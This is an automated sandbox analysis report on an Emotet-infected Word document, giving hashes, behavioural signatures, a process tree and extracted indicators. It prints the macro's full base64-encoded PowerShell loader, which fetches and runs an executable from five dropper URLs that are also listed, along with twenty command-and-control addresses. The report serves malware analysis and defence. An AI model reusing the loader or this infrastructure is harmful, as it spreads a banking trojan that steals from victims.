Overview

overview

10

Static

static

8

emotet_e3_...oc.doc

windows7_x64

10

emotet_e3_...oc.doc

windows10_x64

10

Analysis

  • max time kernel
    82s
  • max time network
    70s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    01-08-2020 01:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    emotet_e3_d52a1de110730672fa2b272977caf41a8d511f9a9f8194bd5ac999635ecacea4_2020-08-01__014040._doc.doc

  • Size

    174KB

  • MD5

    99ad9bf656cab7595feca20f02bf4b9e

  • SHA1

    62ce98b10331a77d3f71eaffbc4862c0e89e1a8b

  • SHA256

    d52a1de110730672fa2b272977caf41a8d511f9a9f8194bd5ac999635ecacea4

  • SHA512

    905999d91251c35ae1459dc24dcf509fa0dde1e6b0ff5f2d351f355afc11d6273f81e2d77b0fa6bbc639b75db8eecdab9fc862543c3795c6ec2a46962ccd6f14

Score
10/10
trojanbankeremotet

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://prolicitar.com.br/privilege/VwWMjYDU/
exe.dropper

http://proreclame.nl/assets/Riw/
exe.dropper

http://www.meltonian.net/Blog/Zaviixl730/
exe.dropper

http://www.mollymoody.com/iRVKRMq/
exe.dropper

https://mwrouse.com/cs2300/qVJaPCy/

Extracted

Family

emotet

C2

187.64.128.197:80

198.57.203.63:8080

163.172.107.70:8080

212.112.113.235:80

157.7.164.178:8081

181.167.35.84:80

212.156.133.218:80

185.142.236.163:443

181.143.101.19:8080

75.127.14.170:8080

115.165.3.213:80

190.55.233.156:80

139.59.12.63:8080

144.139.91.187:80

37.70.131.107:80

181.113.229.139:443

41.185.29.128:8080

177.37.81.212:443

5.79.70.250:8080

78.188.170.128:80
rsa_pubkey.plain

Signatures

  • Executes dropped EXE 2 IoCs
  • Emotet Payload 4 IoCs

    Detects Emotet payload in memory.

  • Modifies registry class 280 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

    trojanbankeremotet
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Blacklisted process makes network request 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Drops file in System32 directory 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e3_d52a1de110730672fa2b272977caf41a8d511f9a9f8194bd5ac999635ecacea4_2020-08-01__014040._doc.doc"
    1⤵
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1240
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABWAE0AQgBBAE8AaABvAHcAPQAnAEEASgBEAFEAUwBrAHMAdQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAYwBVAGAAUgBJAGAAVAB5AHAAYABSAE8AVABPAGMAYABPAGwAIgAgAD0AIAAnAHQAbABzADEAMgAsACAAdABsAHMAMQAxACwAIAB0AGwAcwAnADsAJABIAFAATABCAEkAYQB6AGcAIAA9ACAAJwA3ADUAMQAnADsAJABNAEwASgBUAFoAeQB4AGgAPQAnAFcATABMAFkATQBkAGUAZgAnADsAJABXAEgATgBDAFcAYwBqAHIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEgAUABMAEIASQBhAHoAZwArACcALgBlAHgAZQAnADsAJABWAFQARgBOAEEAdwBqAGkAPQAnAFEAVwBBAEoATgBoAHAAdAAnADsAJABIAFcAVQBTAEMAcgBxAGEAPQAuACgAJwBuAGUAdwAnACsAJwAtAG8AYgBqAGUAJwArACcAYwB0ACcAKQAgAE4ARQB0AC4AdwBlAGIAQwBsAGkARQBuAHQAOwAkAFAASQBMAEQAUQBzAGYAeAA9ACcAaAB0AHQAcAA6AC8ALwBwAHIAbwBsAGkAYwBpAHQAYQByAC4AYwBvAG0ALgBiAHIALwBwAHIAaQB2AGkAbABlAGcAZQAvAFYAdwBXAE0AagBZAEQAVQAvACoAaAB0AHQAcAA6AC8ALwBwAHIAbwByAGUAYwBsAGEAbQBlAC4AbgBsAC8AYQBzAHMAZQB0AHMALwBSAGkAdwAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG0AZQBsAHQAbwBuAGkAYQBuAC4AbgBlAHQALwBCAGwAbwBnAC8AWgBhAHYAaQBpAHgAbAA3ADMAMAAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG0AbwBsAGwAeQBtAG8AbwBkAHkALgBjAG8AbQAvAGkAUgBWAEsAUgBNAHEALwAqAGgAdAB0AHAAcwA6AC8ALwBtAHcAcgBvAHUAcwBlAC4AYwBvAG0ALwBjAHMAMgAzADAAMAAvAHEAVgBKAGEAUABDAHkALwAnAC4AIgBzAGAAUABMAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAE0AUwBCAEIAUQBhAHoAegA9ACcATwBMAFEATgBPAGYAdgB5ACcAOwBmAG8AcgBlAGEAYwBoACgAJABZAFQATQBYAFQAZQB6AHMAIABpAG4AIAAkAFAASQBMAEQAUQBzAGYAeAApAHsAdAByAHkAewAkAEgAVwBVAFMAQwByAHEAYQAuACIARABgAG8AVwBuAGwATwBBAGAARABmAGkAYABMAEUAIgAoACQAWQBUAE0AWABUAGUAegBzACwAIAAkAFcASABOAEMAVwBjAGoAcgApADsAJABFAFkATABOAEsAcgBpAGgAPQAnAE8ATgBYAEUASgB0AHAAcgAnADsASQBmACAAKAAoACYAKAAnAEcAJwArACcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAFcASABOAEMAVwBjAGoAcgApAC4AIgBMAGUAYABOAEcAdABoACIAIAAtAGcAZQAgADIAOQA2ADAANAApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAQwBSAEUAYABBAHQAZQAiACgAJABXAEgATgBDAFcAYwBqAHIAKQA7ACQAVQBEAEYATwBBAGIAdQB3AD0AJwBEAEgAVgBPAFAAZwBrAHUAJwA7AGIAcgBlAGEAawA7ACQAWQBJAEsAUwBKAG8AawBtAD0AJwBKAEMAWABYAFcAdAB6AGUAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWQBLAEsATABQAHUAagBkAD0AJwBUAFoASQBYAFkAeQBsAHMAJwA=
    1⤵
    • Process spawned unexpected child process
    • Suspicious behavior: EnumeratesProcesses
    • Blacklisted process makes network request
    • Drops file in System32 directory
    • Suspicious use of AdjustPrivilegeToken
    PID:1036
  • C:\Users\Admin\751.exe
    C:\Users\Admin\751.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    • Suspicious use of SetWindowsHookEx
    PID:1776
    • C:\Windows\SysWOW64\CertEnrollCtrl\api-ms-win-downlevel-advapi32-l1-1-0.exe
      "C:\Windows\SysWOW64\CertEnrollCtrl\api-ms-win-downlevel-advapi32-l1-1-0.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      PID:548

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/548-14-0x0000000000290000-0x000000000029C000-memory.dmp

    Filesize

    48KB

    Download

  • memory/1240-2-0x00000000088A0000-0x00000000088A4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1240-4-0x0000000006BE0000-0x0000000006DE0000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1240-5-0x000000000AD00000-0x000000000AD04000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1240-6-0x000000000BD80000-0x000000000BD84000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1776-10-0x00000000002D0000-0x00000000002DC000-memory.dmp

    Filesize

    48KB

    Download